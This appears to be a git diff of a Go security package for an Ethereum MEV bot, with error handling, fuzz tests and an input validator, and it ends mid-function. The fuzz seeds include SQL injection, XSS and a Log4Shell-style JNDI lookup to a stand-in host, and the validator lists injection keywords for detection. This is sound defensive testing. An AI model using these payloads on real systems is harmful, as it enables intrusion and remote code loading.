eh.errorMetrics.ErrorsByCategory[err.Category]++
|
||||
eh.errorMetrics.ErrorsBySeverity[err.Severity]++
|
||||
|
||||
if err.Sensitive {
|
||||
eh.errorMetrics.SensitiveDataLeaks++
|
||||
}
|
||||
}
|
||||
|
||||
// logError logs the error appropriately based on sensitivity and severity
|
||||
func (eh *ErrorHandler) logError(err *SecureError) {
|
||||
logContext := map[string]interface{}{
|
||||
"error_code": err.Code,
|
||||
"error_category": string(err.Category),
|
||||
"error_severity": string(err.Severity),
|
||||
"timestamp": err.Timestamp,
|
||||
}
|
||||
|
||||
// Add safe context
|
||||
for key, value := range err.Context {
|
||||
if !eh.isSensitiveField(key) {
|
||||
logContext[key] = value
|
||||
}
|
||||
}
|
||||
|
||||
logMessage := err.Message
|
||||
if err.Sensitive {
|
||||
logMessage = "Sensitive error occurred (details redacted)"
|
||||
logContext["sensitive"] = true
|
||||
}
|
||||
|
||||
switch err.Severity {
|
||||
case ErrorSeverityCritical:
|
||||
eh.logger.Error(logMessage)
|
||||
case ErrorSeverityHigh:
|
||||
eh.logger.Error(logMessage)
|
||||
case ErrorSeverityMedium:
|
||||
eh.logger.Warn(logMessage)
|
||||
case ErrorSeverityLow:
|
||||
eh.logger.Info(logMessage)
|
||||
default:
|
||||
eh.logger.Info(logMessage)
|
||||
}
|
||||
}
|
||||
|
||||
// GetMetrics returns current error metrics
|
||||
func (eh *ErrorHandler) GetMetrics() *ErrorMetrics {
|
||||
return eh.errorMetrics
|
||||
}
|
||||
|
||||
// Common error creation helpers
|
||||
|
||||
// NewAuthenticationError creates a new authentication error
|
||||
func (eh *ErrorHandler) NewAuthenticationError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "AUTH_FAILED", message, ErrorCategoryAuthentication, ErrorSeverityHigh)
|
||||
}
|
||||
|
||||
// NewAuthorizationError creates a new authorization error
|
||||
func (eh *ErrorHandler) NewAuthorizationError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "AUTHZ_FAILED", message, ErrorCategoryAuthorization, ErrorSeverityHigh)
|
||||
}
|
||||
|
||||
// NewValidationError creates a new validation error
|
||||
func (eh *ErrorHandler) NewValidationError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "VALIDATION_FAILED", message, ErrorCategoryValidation, ErrorSeverityMedium)
|
||||
}
|
||||
|
||||
// NewRateLimitError creates a new rate limit error
|
||||
func (eh *ErrorHandler) NewRateLimitError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "RATE_LIMIT_EXCEEDED", message, ErrorCategoryRateLimit, ErrorSeverityMedium)
|
||||
}
|
||||
|
||||
// NewEncryptionError creates a new encryption error
|
||||
func (eh *ErrorHandler) NewEncryptionError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "ENCRYPTION_FAILED", message, ErrorCategoryEncryption, ErrorSeverityCritical)
|
||||
}
|
||||
|
||||
// NewTransactionError creates a new transaction error
|
||||
func (eh *ErrorHandler) NewTransactionError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "TRANSACTION_FAILED", message, ErrorCategoryTransaction, ErrorSeverityHigh)
|
||||
}
|
||||
|
||||
// NewInternalError creates a new internal error
|
||||
func (eh *ErrorHandler) NewInternalError(message string, err error) *SecureError {
|
||||
return eh.WrapError(err, "INTERNAL_ERROR", message, ErrorCategoryInternal, ErrorSeverityCritical)
|
||||
}
|
||||
267
orig/pkg/security/input_validation_fuzz_test.go
Normal file
267
orig/pkg/security/input_validation_fuzz_test.go
Normal file
@@ -0,0 +1,267 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"math/big"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
)
|
||||
|
||||
// FuzzValidateAddress tests address validation with random inputs
|
||||
func FuzzValidateAddress(f *testing.F) {
|
||||
validator := NewInputValidator(42161) // Arbitrum chain ID
|
||||
|
||||
// Seed corpus with known patterns
|
||||
f.Add("0x0000000000000000000000000000000000000000") // Zero address
|
||||
f.Add("0xa0b86991c431c431c8f4c431c431c431c431c431c") // Valid address
|
||||
f.Add("0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef") // Suspicious pattern
|
||||
f.Add("0x") // Short invalid
|
||||
f.Add("") // Empty
|
||||
f.Add("not_an_address") // Invalid format
|
||||
|
||||
f.Fuzz(func(t *testing.T, addrStr string) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("ValidateAddress panicked with input %q: %v", addrStr, r)
|
||||
}
|
||||
}()
|
||||
|
||||
// Test that validation doesn't crash on any input
|
||||
if common.IsHexAddress(addrStr) {
|
||||
addr := common.HexToAddress(addrStr)
|
||||
result := validator.ValidateAddress(addr)
|
||||
|
||||
// Ensure result is never nil
|
||||
if result == nil {
|
||||
t.Error("ValidateAddress returned nil result")
|
||||
}
|
||||
|
||||
// Validate result structure
|
||||
if len(result.Errors) == 0 && !result.Valid {
|
||||
t.Error("Result marked invalid but no errors provided")
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzValidateString tests string validation with various injection attempts
|
||||
func FuzzValidateString(f *testing.F) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
// Seed with common injection patterns
|
||||
f.Add("'; DROP TABLE users; --")
|
||||
f.Add("<script>alert('xss')</script>")
|
||||
f.Add("${jndi:ldap://evil.com/}")
|
||||
f.Add("\x00\x01\x02\x03\x04")
|
||||
f.Add(strings.Repeat("A", 10000))
|
||||
f.Add("normal_string")
|
||||
|
||||
f.Fuzz(func(t *testing.T, input string) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("ValidateString panicked with input length %d: %v", len(input), r)
|
||||
}
|
||||
}()
|
||||
|
||||
result := validator.ValidateString(input, "test_field", 1000)
|
||||
|
||||
// Ensure validation completes
|
||||
if result == nil {
|
||||
t.Error("ValidateString returned nil result")
|
||||
}
|
||||
|
||||
// Test sanitization
|
||||
sanitized := validator.SanitizeInput(input)
|
||||
|
||||
// Ensure sanitized string doesn't contain null bytes
|
||||
if strings.Contains(sanitized, "\x00") {
|
||||
t.Error("Sanitized string still contains null bytes")
|
||||
}
|
||||
|
||||
// Ensure sanitization doesn't crash
|
||||
if len(sanitized) > len(input)*2 {
|
||||
t.Error("Sanitized string unexpectedly longer than 2x original")
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzValidateNumericString tests numeric string validation
|
||||
func FuzzValidateNumericString(f *testing.F) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
// Seed with various numeric patterns
|
||||
f.Add("123.456")
|
||||
f.Add("-123")
|
||||
f.Add("0.000000000000000001")
|
||||
f.Add("999999999999999999999")
|
||||
f.Add("00123")
|
||||
f.Add("123.456.789")
|
||||
f.Add("1e10")
|
||||
f.Add("abc123")
|
||||
|
||||
f.Fuzz(func(t *testing.T, input string) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("ValidateNumericString panicked with input %q: %v", input, r)
|
||||
}
|
||||
}()
|
||||
|
||||
result := validator.ValidateNumericString(input, "test_number")
|
||||
|
||||
if result == nil {
|
||||
t.Error("ValidateNumericString returned nil result")
|
||||
}
|
||||
|
||||
// If marked valid, should actually be parseable as number
|
||||
if result.Valid {
|
||||
if _, ok := new(big.Float).SetString(input); !ok {
|
||||
// Allow some flexibility for our regex vs big.Float parsing
|
||||
if !strings.Contains(input, ".") {
|
||||
if _, ok := new(big.Int).SetString(input, 10); !ok {
|
||||
t.Errorf("String marked as valid numeric but not parseable: %q", input)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzTransactionValidation tests transaction validation with random transaction data
|
||||
func FuzzTransactionValidation(f *testing.F) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
f.Fuzz(func(t *testing.T, nonce, gasLimit uint64, gasPrice, value int64, dataLen uint8) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("Transaction validation panicked: %v", r)
|
||||
}
|
||||
}()
|
||||
|
||||
// Constrain inputs to reasonable ranges
|
||||
if gasLimit > 50000000 {
|
||||
gasLimit = gasLimit % 50000000
|
||||
}
|
||||
if dataLen > 100 {
|
||||
dataLen = dataLen % 100
|
||||
}
|
||||
|
||||
// Create test transaction
|
||||
data := make([]byte, dataLen)
|
||||
for i := range data {
|
||||
data[i] = byte(i % 256)
|
||||
}
|
||||
|
||||
var gasPriceBig, valueBig *big.Int
|
||||
if gasPrice >= 0 {
|
||||
gasPriceBig = big.NewInt(gasPrice)
|
||||
} else {
|
||||
gasPriceBig = big.NewInt(-gasPrice)
|
||||
}
|
||||
|
||||
if value >= 0 {
|
||||
valueBig = big.NewInt(value)
|
||||
} else {
|
||||
valueBig = big.NewInt(-value)
|
||||
}
|
||||
|
||||
to := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
tx := types.NewTransaction(nonce, to, valueBig, gasLimit, gasPriceBig, data)
|
||||
|
||||
result := validator.ValidateTransaction(tx)
|
||||
|
||||
if result == nil {
|
||||
t.Error("ValidateTransaction returned nil result")
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzSwapParamsValidation tests swap parameter validation
|
||||
func FuzzSwapParamsValidation(f *testing.F) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
f.Fuzz(func(t *testing.T, amountIn, amountOut int64, slippage uint16, hoursFromNow int8) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("SwapParams validation panicked: %v", r)
|
||||
}
|
||||
}()
|
||||
|
||||
// Create test swap parameters
|
||||
params := &SwapParams{
|
||||
TokenIn: common.HexToAddress("0x1111111111111111111111111111111111111111"),
|
||||
TokenOut: common.HexToAddress("0x2222222222222222222222222222222222222222"),
|
||||
AmountIn: big.NewInt(amountIn),
|
||||
AmountOut: big.NewInt(amountOut),
|
||||
Slippage: uint64(slippage),
|
||||
Deadline: time.Now().Add(time.Duration(hoursFromNow) * time.Hour),
|
||||
Recipient: common.HexToAddress("0x3333333333333333333333333333333333333333"),
|
||||
Pool: common.HexToAddress("0x4444444444444444444444444444444444444444"),
|
||||
}
|
||||
|
||||
result := validator.ValidateSwapParams(params)
|
||||
|
||||
if result == nil {
|
||||
t.Error("ValidateSwapParams returned nil result")
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzBatchSizeValidation tests batch size validation with various inputs
|
||||
func FuzzBatchSizeValidation(f *testing.F) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
// Seed with known operation types
|
||||
operations := []string{"transaction", "swap", "arbitrage", "query", "unknown"}
|
||||
|
||||
f.Fuzz(func(t *testing.T, size int, opIndex uint8) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("BatchSize validation panicked: %v", r)
|
||||
}
|
||||
}()
|
||||
|
||||
operation := operations[int(opIndex)%len(operations)]
|
||||
|
||||
result := validator.ValidateBatchSize(size, operation)
|
||||
|
||||
if result == nil {
|
||||
t.Error("ValidateBatchSize returned nil result")
|
||||
}
|
||||
|
||||
// Negative sizes should always be invalid
|
||||
if size <= 0 && result.Valid {
|
||||
t.Errorf("Negative/zero batch size %d marked as valid for operation %s", size, operation)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// Removed FuzzABIValidation to avoid circular import - moved to pkg/arbitrum/abi_decoder_fuzz_test.go
|
||||
|
||||
// BenchmarkInputValidation benchmarks validation performance under stress
|
||||
func BenchmarkInputValidation(b *testing.B) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
// Test with various input sizes
|
||||
testInputs := []string{
|
||||
"short",
|
||||
strings.Repeat("medium_length_string_", 10),
|
||||
strings.Repeat("long_string_with_repeating_pattern_", 100),
|
||||
}
|
||||
|
||||
for _, input := range testInputs {
|
||||
b.Run("ValidateString_len_"+string(rune(len(input))), func(b *testing.B) {
|
||||
for i := 0; i < b.N; i++ {
|
||||
validator.ValidateString(input, "test", 10000)
|
||||
}
|
||||
})
|
||||
|
||||
b.Run("SanitizeInput_len_"+string(rune(len(input))), func(b *testing.B) {
|
||||
for i := 0; i < b.N; i++ {
|
||||
validator.SanitizeInput(input)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
624
orig/pkg/security/input_validator.go
Normal file
624
orig/pkg/security/input_validator.go
Normal file
@@ -0,0 +1,624 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"math/big"
|
||||
"regexp"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
)
|
||||
|
||||
// InputValidator provides comprehensive input validation for all MEV bot operations
|
||||
type InputValidator struct {
|
||||
safeMath *SafeMath
|
||||
maxGasLimit uint64
|
||||
maxGasPrice *big.Int
|
||||
chainID uint64
|
||||
}
|
||||
|
||||
// ValidationResult contains the result of input validation
|
||||
type ValidationResult struct {
|
||||
Valid bool `json:"valid"`
|
||||
Errors []string `json:"errors,omitempty"`
|
||||
Warnings []string `json:"warnings,omitempty"`
|
||||
}
|
||||
|
||||
// TransactionParams represents transaction parameters for validation
|
||||
type TransactionParams struct {
|
||||
To *common.Address `json:"to"`
|
||||
Value *big.Int `json:"value"`
|
||||
Data []byte `json:"data"`
|
||||
Gas uint64 `json:"gas"`
|
||||
GasPrice *big.Int `json:"gas_price"`
|
||||
Nonce uint64 `json:"nonce"`
|
||||
}
|
||||
|
||||
// SwapParams represents swap parameters for validation
|
||||
type SwapParams struct {
|
||||
TokenIn common.Address `json:"token_in"`
|
||||
TokenOut common.Address `json:"token_out"`
|
||||
AmountIn *big.Int `json:"amount_in"`
|
||||
AmountOut *big.Int `json:"amount_out"`
|
||||
Slippage uint64 `json:"slippage_bps"`
|
||||
Deadline time.Time `json:"deadline"`
|
||||
Recipient common.Address `json:"recipient"`
|
||||
Pool common.Address `json:"pool"`
|
||||
}
|
||||
|
||||
// ArbitrageParams represents arbitrage parameters for validation
|
||||
type ArbitrageParams struct {
|
||||
BuyPool common.Address `json:"buy_pool"`
|
||||
SellPool common.Address `json:"sell_pool"`
|
||||
Token common.Address `json:"token"`
|
||||
AmountIn *big.Int `json:"amount_in"`
|
||||
MinProfit *big.Int `json:"min_profit"`
|
||||
MaxGasPrice *big.Int `json:"max_gas_price"`
|
||||
Deadline time.Time `json:"deadline"`
|
||||
}
|
||||
|
||||
// NewInputValidator creates a new input validator with security limits
|
||||
func NewInputValidator(chainID uint64) *InputValidator {
|
||||
return &InputValidator{
|
||||
safeMath: NewSafeMath(),
|
||||
maxGasLimit: 15000000, // 15M gas limit
|
||||
maxGasPrice: new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9)), // 10000 Gwei
|
||||
chainID: chainID,
|
||||
}
|
||||
}
|
||||
|
||||
// ValidateAddress validates an Ethereum address
|
||||
func (iv *InputValidator) ValidateAddress(addr common.Address) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Check for zero address
|
||||
if addr == (common.Address{}) {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "address cannot be zero address")
|
||||
return result
|
||||
}
|
||||
|
||||
// Check for known malicious addresses (extend this list as needed)
|
||||
maliciousAddresses := []common.Address{
|
||||
// Add known malicious addresses here
|
||||
common.HexToAddress("0x0000000000000000000000000000000000000000"),
|
||||
}
|
||||
|
||||
for _, malicious := range maliciousAddresses {
|
||||
if addr == malicious {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "address is flagged as malicious")
|
||||
return result
|
||||
}
|
||||
}
|
||||
|
||||
// Check for suspicious patterns
|
||||
addrStr := addr.Hex()
|
||||
if strings.Contains(strings.ToLower(addrStr), "dead") ||
|
||||
strings.Contains(strings.ToLower(addrStr), "beef") {
|
||||
result.Warnings = append(result.Warnings, "address contains suspicious patterns")
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateTransaction validates a complete transaction
|
||||
func (iv *InputValidator) ValidateTransaction(tx *types.Transaction) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Validate chain ID
|
||||
if tx.ChainId().Uint64() != iv.chainID {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("invalid chain ID: expected %d, got %d", iv.chainID, tx.ChainId().Uint64()))
|
||||
}
|
||||
|
||||
// Validate gas limit
|
||||
if tx.Gas() > iv.maxGasLimit {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("gas limit %d exceeds maximum %d", tx.Gas(), iv.maxGasLimit))
|
||||
}
|
||||
|
||||
if tx.Gas() < 21000 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "gas limit below minimum 21000")
|
||||
}
|
||||
|
||||
// Validate gas price
|
||||
if tx.GasPrice() != nil {
|
||||
if err := iv.safeMath.ValidateGasPrice(tx.GasPrice()); err != nil {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("invalid gas price: %v", err))
|
||||
}
|
||||
}
|
||||
|
||||
// Validate transaction value
|
||||
if tx.Value() != nil {
|
||||
if err := iv.safeMath.ValidateTransactionValue(tx.Value()); err != nil {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("invalid transaction value: %v", err))
|
||||
}
|
||||
}
|
||||
|
||||
// Validate recipient address
|
||||
if tx.To() != nil {
|
||||
addrResult := iv.ValidateAddress(*tx.To())
|
||||
if !addrResult.Valid {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "invalid recipient address")
|
||||
result.Errors = append(result.Errors, addrResult.Errors...)
|
||||
}
|
||||
result.Warnings = append(result.Warnings, addrResult.Warnings...)
|
||||
}
|
||||
|
||||
// Validate transaction data for suspicious patterns
|
||||
if len(tx.Data()) > 0 {
|
||||
dataResult := iv.validateTransactionData(tx.Data())
|
||||
if !dataResult.Valid {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, dataResult.Errors...)
|
||||
}
|
||||
result.Warnings = append(result.Warnings, dataResult.Warnings...)
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateSwapParams validates swap parameters
|
||||
func (iv *InputValidator) ValidateSwapParams(params *SwapParams) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Validate addresses
|
||||
for _, addr := range []common.Address{params.TokenIn, params.TokenOut, params.Recipient, params.Pool} {
|
||||
addrResult := iv.ValidateAddress(addr)
|
||||
if !addrResult.Valid {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, addrResult.Errors...)
|
||||
}
|
||||
result.Warnings = append(result.Warnings, addrResult.Warnings...)
|
||||
}
|
||||
|
||||
// Validate tokens are different
|
||||
if params.TokenIn == params.TokenOut {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "token in and token out cannot be the same")
|
||||
}
|
||||
|
||||
// Validate amounts
|
||||
if params.AmountIn == nil || params.AmountIn.Sign() <= 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "amount in must be positive")
|
||||
}
|
||||
|
||||
if params.AmountOut == nil || params.AmountOut.Sign() <= 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "amount out must be positive")
|
||||
}
|
||||
|
||||
// Validate slippage
|
||||
if params.Slippage > 10000 { // Max 100%
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "slippage cannot exceed 100%")
|
||||
}
|
||||
|
||||
if params.Slippage > 500 { // Warn if > 5%
|
||||
result.Warnings = append(result.Warnings, "slippage above 5% detected")
|
||||
}
|
||||
|
||||
// Validate deadline
|
||||
if params.Deadline.Before(time.Now()) {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "deadline is in the past")
|
||||
}
|
||||
|
||||
if params.Deadline.After(time.Now().Add(1 * time.Hour)) {
|
||||
result.Warnings = append(result.Warnings, "deadline is more than 1 hour in the future")
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateArbitrageParams validates arbitrage parameters
|
||||
func (iv *InputValidator) ValidateArbitrageParams(params *ArbitrageParams) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Validate addresses
|
||||
for _, addr := range []common.Address{params.BuyPool, params.SellPool, params.Token} {
|
||||
addrResult := iv.ValidateAddress(addr)
|
||||
if !addrResult.Valid {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, addrResult.Errors...)
|
||||
}
|
||||
result.Warnings = append(result.Warnings, addrResult.Warnings...)
|
||||
}
|
||||
|
||||
// Validate pools are different
|
||||
if params.BuyPool == params.SellPool {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "buy pool and sell pool cannot be the same")
|
||||
}
|
||||
|
||||
// Validate amounts
|
||||
if params.AmountIn == nil || params.AmountIn.Sign() <= 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "amount in must be positive")
|
||||
}
|
||||
|
||||
if params.MinProfit == nil || params.MinProfit.Sign() <= 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "minimum profit must be positive")
|
||||
}
|
||||
|
||||
// Validate gas price
|
||||
if params.MaxGasPrice != nil {
|
||||
if err := iv.safeMath.ValidateGasPrice(params.MaxGasPrice); err != nil {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("invalid max gas price: %v", err))
|
||||
}
|
||||
}
|
||||
|
||||
// Validate deadline
|
||||
if params.Deadline.Before(time.Now()) {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "deadline is in the past")
|
||||
}
|
||||
|
||||
// Check if arbitrage is potentially profitable
|
||||
if params.AmountIn != nil && params.MinProfit != nil {
|
||||
// Rough profitability check (at least 0.1% profit)
|
||||
minProfitThreshold, _ := iv.safeMath.SafePercent(params.AmountIn, 10) // 0.1%
|
||||
if params.MinProfit.Cmp(minProfitThreshold) < 0 {
|
||||
result.Warnings = append(result.Warnings, "minimum profit threshold is very low")
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// validateTransactionData validates transaction data for suspicious patterns
|
||||
func (iv *InputValidator) validateTransactionData(data []byte) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Check data size
|
||||
if len(data) > 100000 { // 100KB limit
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "transaction data exceeds size limit")
|
||||
return result
|
||||
}
|
||||
|
||||
// Convert to hex string for pattern matching
|
||||
dataHex := common.Bytes2Hex(data)
|
||||
|
||||
// Check for suspicious patterns
|
||||
suspiciousPatterns := []struct {
|
||||
pattern string
|
||||
message string
|
||||
critical bool
|
||||
}{
|
||||
{"selfdestruct", "contains selfdestruct operation", true},
|
||||
{"delegatecall", "contains delegatecall operation", false},
|
||||
{"create2", "contains create2 operation", false},
|
||||
{"ff" + strings.Repeat("00", 19), "contains potential burn address", false},
|
||||
}
|
||||
|
||||
for _, suspicious := range suspiciousPatterns {
|
||||
if strings.Contains(strings.ToLower(dataHex), strings.ToLower(suspicious.pattern)) {
|
||||
if suspicious.critical {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "transaction "+suspicious.message)
|
||||
} else {
|
||||
result.Warnings = append(result.Warnings, "transaction "+suspicious.message)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check for known function selectors of risky operations
|
||||
if len(data) >= 4 {
|
||||
selector := common.Bytes2Hex(data[:4])
|
||||
riskySelectors := map[string]string{
|
||||
"ff6cae96": "selfdestruct function",
|
||||
"9dc29fac": "burn function",
|
||||
"42966c68": "burn function (alternative)",
|
||||
}
|
||||
|
||||
if message, exists := riskySelectors[selector]; exists {
|
||||
result.Warnings = append(result.Warnings, "transaction calls "+message)
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateString validates string inputs for injection attacks
|
||||
func (iv *InputValidator) ValidateString(input, fieldName string, maxLength int) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Check length
|
||||
if len(input) > maxLength {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("%s exceeds maximum length %d", fieldName, maxLength))
|
||||
}
|
||||
|
||||
// Check for null bytes
|
||||
if strings.Contains(input, "\x00") {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("%s contains null bytes", fieldName))
|
||||
}
|
||||
|
||||
// Check for control characters
|
||||
controlCharPattern := regexp.MustCompile(`[\x00-\x1f\x7f-\x9f]`)
|
||||
if controlCharPattern.MatchString(input) {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("%s contains control characters", fieldName))
|
||||
}
|
||||
|
||||
// Check for SQL injection patterns
|
||||
sqlPatterns := []string{
|
||||
"'", "\"", "--", "/*", "*/", "xp_", "sp_", "exec", "execute",
|
||||
"select", "insert", "update", "delete", "drop", "create", "alter",
|
||||
"union", "join", "script", "javascript",
|
||||
}
|
||||
|
||||
lowerInput := strings.ToLower(input)
|
||||
for _, pattern := range sqlPatterns {
|
||||
if strings.Contains(lowerInput, pattern) {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("%s contains potentially dangerous pattern: %s", fieldName, pattern))
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateNumericString validates numeric string inputs
|
||||
func (iv *InputValidator) ValidateNumericString(input, fieldName string) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Check if string is numeric
|
||||
numericPattern := regexp.MustCompile(`^[0-9]+(\.[0-9]+)?$`)
|
||||
if !numericPattern.MatchString(input) {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("%s must be numeric", fieldName))
|
||||
return result
|
||||
}
|
||||
|
||||
// Check for leading zeros (except for decimals)
|
||||
if len(input) > 1 && input[0] == '0' && input[1] != '.' {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("%s has leading zeros", fieldName))
|
||||
}
|
||||
|
||||
// Check for reasonable decimal places
|
||||
if strings.Contains(input, ".") {
|
||||
parts := strings.Split(input, ".")
|
||||
if len(parts[1]) > 18 {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("%s has excessive decimal places", fieldName))
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ValidateBatchSize validates batch operation sizes
|
||||
func (iv *InputValidator) ValidateBatchSize(size int, operation string) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
maxBatchSizes := map[string]int{
|
||||
"transaction": 100,
|
||||
"swap": 50,
|
||||
"arbitrage": 20,
|
||||
"query": 1000,
|
||||
}
|
||||
|
||||
maxSize, exists := maxBatchSizes[operation]
|
||||
if !exists {
|
||||
maxSize = 50 // Default
|
||||
}
|
||||
|
||||
if size <= 0 {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "batch size must be positive")
|
||||
}
|
||||
|
||||
if size > maxSize {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("batch size %d exceeds maximum %d for %s operations", size, maxSize, operation))
|
||||
}
|
||||
|
||||
if size > maxSize/2 {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("large batch size %d for %s operations", size, operation))
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// SanitizeInput sanitizes string input by removing dangerous characters
|
||||
func (iv *InputValidator) SanitizeInput(input string) string {
|
||||
// Remove null bytes
|
||||
input = strings.ReplaceAll(input, "\x00", "")
|
||||
|
||||
// Remove control characters except newline and tab
|
||||
controlCharPattern := regexp.MustCompile(`[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]`)
|
||||
input = controlCharPattern.ReplaceAllString(input, "")
|
||||
|
||||
// Trim whitespace
|
||||
input = strings.TrimSpace(input)
|
||||
|
||||
return input
|
||||
}
|
||||
|
||||
// ValidateExternalData performs comprehensive validation for data from external sources
|
||||
func (iv *InputValidator) ValidateExternalData(data []byte, source string, maxSize int) *ValidationResult {
|
||||
result := &ValidationResult{Valid: true}
|
||||
|
||||
// Comprehensive bounds checking
|
||||
if data == nil {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "external data cannot be nil")
|
||||
return result
|
||||
}
|
||||
|
||||
// Check size limits
|
||||
if len(data) > maxSize {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("external data size %d exceeds maximum %d for source %s", len(data), maxSize, source))
|
||||
return result
|
||||
}
|
||||
|
||||
// Check for obviously malformed data patterns
|
||||
if len(data) > 0 {
|
||||
// Check for all-zero data (suspicious)
|
||||
allZero := true
|
||||
for _, b := range data {
|
||||
if b != 0 {
|
||||
allZero = false
|
||||
break
|
||||
}
|
||||
}
|
||||
if allZero && len(data) > 32 {
|
||||
result.Warnings = append(result.Warnings, "external data appears to be all zeros")
|
||||
}
|
||||
|
||||
// Check for repetitive patterns that might indicate malformed data
|
||||
if len(data) >= 4 {
|
||||
pattern := data[:4]
|
||||
repetitive := true
|
||||
for i := 4; i < len(data) && i < 1000; i += 4 { // Check first 1KB for performance
|
||||
if i+4 <= len(data) {
|
||||
for j := 0; j < 4; j++ {
|
||||
if data[i+j] != pattern[j] {
|
||||
repetitive = false
|
||||
break
|
||||
}
|
||||
}
|
||||
if !repetitive {
|
||||
break
|
||||
}
|
